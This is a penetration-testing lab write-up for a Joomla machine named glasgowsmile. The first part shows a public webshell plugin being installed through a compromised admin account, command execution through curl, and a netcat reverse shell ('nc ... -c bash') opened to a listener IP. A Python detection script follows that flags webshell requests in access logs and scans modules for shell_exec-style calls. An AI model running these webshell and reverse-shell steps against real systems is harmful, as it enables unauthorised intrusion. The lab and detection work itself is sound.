Malicious Extension
A super user of the target Joomla instance has been compromised.
Joomla supports installation of custom extensions, which can be any form of PHP code, including a malicious webshell.
Exploit
A Joomla webshell plugin is available.
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/glasgowsmile]
└─$ git clone https://github.com/p0dalirius/Joomla-webshell-plugin ; cd Joomla-webshell-plugin ; make
Cloning into 'Joomla-webshell-plugin'...
remote: Enumerating objects: 33, done.
remote: Counting objects: 100% (33/33), done.
remote: Compressing objects: 100% (31/31), done.
remote: Total 33 (delta 4), reused 25 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (33/33), 3.21 MiB | 22.65 MiB/s, done.
Resolving deltas: 100% (4/4), done.
adding: mod_webshell.xml (deflated 55%)
adding: mod_webshell.php (deflated 63%)
adding: tmpl/ (stored 0%)
adding: tmpl/default.php (deflated 28%)
adding: language/ (stored 0%)
adding: language/en-GB/ (stored 0%)
adding: language/en-GB/en-GB.mod_foo.ini (deflated 43%)
adding: language/en-GB/en-GB.mod_foo.sys.ini (deflated 15%)
[+] Saved to ./dist/joomla-webshell-plugin-1.1.0.zip
Exploit downloaded & packaged for delivery.
Exploitation
The packaged module was installed through the compromised super user account; installation successful.
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/glasgowsmile/Joomla-webshell-plugin]
└─$ curl -X POST http://$IP/joomla/modules/mod_webshell/mod_webshell.php --data "action=exec&cmd=id"
{"stdout":"uid=33(www-data) gid=33(www-data) groups=33(www-data)\n","stderr":"","exec":"id"}
Code execution confirmed.
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/glasgowsmile/Joomla-webshell-plugin]
└─$ curl -X POST http://$IP/joomla/modules/mod_webshell/mod_webshell.php --data "action=exec&cmd=nc 192.168.45.182 9999 -c bash"
Sending a reverse shell to the listener on 192.168.45.182:9999.
Initial foothold established on the glasgowsmile host as the www-data account via installing a malicious extension.
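The foothold above leaves two artifacts a defender can look for: POST requests that hit a module's own .php file directly (Joomla normally routes everything through index.php), preceded by a POST to the administrator installer, and a module source tree that calls command-execution functions. The following detection script is an added example, not part of the original writeup or the plugin's repository. It assumes Apache/nginx combined access-log format; the log lines and the PHP fixture are constructed for the example, the function names are this example's own, and com_installer is the real name of the Joomla administrator installer component.

```python
import os
import re

# Apache/nginx "combined" access-log format (sample lines below are constructed).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Joomla serves requests through index.php; a request that reaches a module's own
# .php file directly is how a dropped webshell module gets used.
DIRECT_MODULE_PHP = re.compile(r'/modules/[^?]*\.php(?:\?|$)')
# The administrator installer component (real Joomla component name).
INSTALLER = re.compile(r'/administrator/index\.php\?.*option=com_installer')
# Calls a presentation module has no legitimate reason to make.
DANGEROUS_CALLS = re.compile(r'\b(shell_exec|exec|system|passthru|proc_open|popen)\s*\(')

# Constructed access-log excerpt: an extension install from the backend followed by
# direct POSTs to the new module, plus a benign 403 on a real module's template file.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jan/2024:12:00:01 +0000] "GET /joomla/index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jan/2024:12:00:05 +0000] "POST /joomla/administrator/index.php?option=com_installer&view=install HTTP/1.1" 303 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jan/2024:12:00:09 +0000] "POST /joomla/modules/mod_webshell/mod_webshell.php HTTP/1.1" 200 98 "-" "curl/8.4.0"
203.0.113.7 - - [10/Jan/2024:12:00:15 +0000] "POST /joomla/modules/mod_webshell/mod_webshell.php HTTP/1.1" 200 45 "-" "curl/8.4.0"
10.0.0.5 - - [10/Jan/2024:12:01:00 +0000] "GET /joomla/modules/mod_menu/tmpl/default.php HTTP/1.1" 403 199 "-" "Mozilla/5.0"
"""

# Constructed fixture for the source scanner (a non-functional stand-in, not the plugin).
SAMPLE_MODULE_PHP = "<?php\n// fixture only\n$r = shell_exec($c);\necho json_encode(['stdout' => $r]);\n"


def classify_requests(log_text):
    """Return (ip, path, label) for requests matching the malicious-extension pattern.

    'extension_install' marks POSTs to the administrator installer, which should be
    rare and tied to a change window; 'direct_module_php' marks successful hits on
    a module's own .php file. Non-200 direct hits are ignored (blocked by htaccess).
    """
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m['path']
        if m['method'] == 'POST' and INSTALLER.search(path):
            findings.append((m['ip'], path, 'extension_install'))
        elif DIRECT_MODULE_PHP.search(path) and m['status'] == '200':
            findings.append((m['ip'], path, 'direct_module_php'))
    return findings


def dangerous_calls(php_source):
    """Sorted list of command-execution functions called in a PHP source string."""
    return sorted(set(DANGEROUS_CALLS.findall(php_source)))


def audit_modules_dir(modules_root):
    """Walk a Joomla modules/ tree and map each .php file to the risky calls it makes."""
    report = {}
    for dirpath, _, files in os.walk(modules_root):
        for name in files:
            if not name.endswith('.php'):
                continue
            full = os.path.join(dirpath, name)
            with open(full, encoding='utf-8', errors='replace') as fh:
                calls = dangerous_calls(fh.read())
            if calls:
                report[full] = calls
    return report


if __name__ == '__main__':
    for ip, path, label in classify_requests(SAMPLE_LOG):
        print(f'{label:20} {ip:15} {path}')
    print('fixture calls:', dangerous_calls(SAMPLE_MODULE_PHP))
```

Run `audit_modules_dir('/var/www/html/joomla/modules')` on a real install to get a per-file list; any hit outside a known, reviewed extension is worth pulling alongside the installer POSTs from the same client.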